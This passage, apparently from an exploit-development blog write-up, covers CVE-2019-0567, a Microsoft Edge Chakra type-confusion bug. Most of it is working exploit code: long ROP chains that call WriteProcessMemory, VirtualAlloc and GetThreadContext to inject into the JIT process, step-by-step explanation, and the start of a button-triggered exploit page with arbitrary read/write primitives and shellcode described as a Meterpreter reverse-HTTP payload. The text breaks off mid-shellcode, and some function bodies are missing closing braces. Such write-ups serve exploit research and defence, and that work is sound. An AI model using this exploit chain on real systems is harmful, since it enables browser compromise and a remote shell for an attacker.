write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        

// Locate store CONTEXT.Rsp and store it in .data of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);		// 0x1804c37c5: mov rax, qword [rcx] ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // ret gadget we want to overwrite our remote thread's RIP with 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)

// WriteProcessMemory() ROP chain (Number 4)
// Stage 9 -> Write our ROP chain to the remote process, using the JIT handle and the leaked stack via GetThreadContext()

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000100, 0x00000000);             // SIZE_T nSize (0x100) (CONTEXT.Rsp is writable and a "full" stack, so 0x100 is more than enough)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118-0x08, kernelbaseHigh);      // .data section of kernelbase.dll where CONTEXT.Rsp resides
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret (Pointer to CONTEXT.Rsp)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26ef31, chakraHigh);      // 0x18026ef31: mov rax, qword [rax] ; ret (get CONTEXT.Rsp)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x435f21, chakraHigh);      // 0x180435f21: mov rdx, rax ; mov rax, rdx ; add rsp, 0x28 ; ret (RAX and RDX now both have CONTEXT.Rsp)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// LPCVOID lpBuffer (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropBegin, chakraHigh);      // .data section of chakra.dll where our ROP chain is

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds the full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it  

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x20)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

Setting a jmp rax breakpoint, and then after stepping through the CONTEXT.Rip update and CONTEXT.Rsp saving gadgets, we can start executing our WriteProcessMemory ROP chain.

As we can see, we set nSize to 0x100. We are attempting to copy our ROP chain into the JIT process, and our ROP chain is much smaller than 0x100. However, instead of calculating the size, we simply can just use 0x100 bytes as we have a full stack to work with in the remote process and it is writable. After setting the size, our call is in the following state:

	sizeof(rop_chain)			// Size of our ROP chain

The next parameter we will fix is lpBaseAddress, which will be where we want to write the ROP chain. In this case, it is the stack location, which we can leak from our preserved CONTEXT.Rsp address.

Using the same β€œtrick” as before, our mov rdx, [rdx+0x8] gadget is circumvented by simply subtracting 0x8 before had the value we want to place in RDX. From here, we can clearly see we have extracted what CONTEXT.Rsp pointed to - and that is the stack within the JIT process.

Our call is in the following state:

	addressof(CONTEXT.Rsp),			// Address of our remote thread's stack
	sizeof(rop_chain)			// Size of our ROP chain

Next up is the lpBuffer parameter. This parameter is very straight forward, as we can simply just pop the address of the .data section of chakra.dll where our ROP chain was placed.

Our call is now in the below state:

	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain

The next (and last register-placed parameter) is our HANDLE.

We now have our call almost completed:

	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain

Lastly, all we need to do is set a NULL value of RSP + 0x28 and set RAX to WriteProcessMemory. The full call can be seen below:

	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	NULL 						// Optional

We can then attach another WinDbg session to the JIT process and examine the write operation.

As we can see, we have remotely placed our ROP chain to RSP! All we have to do now is update our thread’s RIP member via SetThreadContext and then resume the thread to kick off execution!

SetThreadContext and ResumeThread ROP Chain

All that is left now is to set the thread’s CONTEXT and resume the thread. Here is how this looks:

	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)		// The updated CONTEXT structure
	threadHandle,				// A handle to the thread we want to resume (our thread we created via CreateRemoteThread)

Here is our final exploit:

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));

    // Counter
    let countMe = 0;

    // Helper function for counting
    function inc()

    // Shellcode (will be executed in JIT process)
    // msfvenom -p windows/x64/meterpreter/reverse_http LHOST= LPORT=443 -f c
    write64(chakraLo+0x74b000+countMe, chakraHigh, 0xe48348fc, 0x00cce8f0);
	write64(chakraLo+0x74b000+countMe, chakraHigh, 0x51410000, 0x51525041);
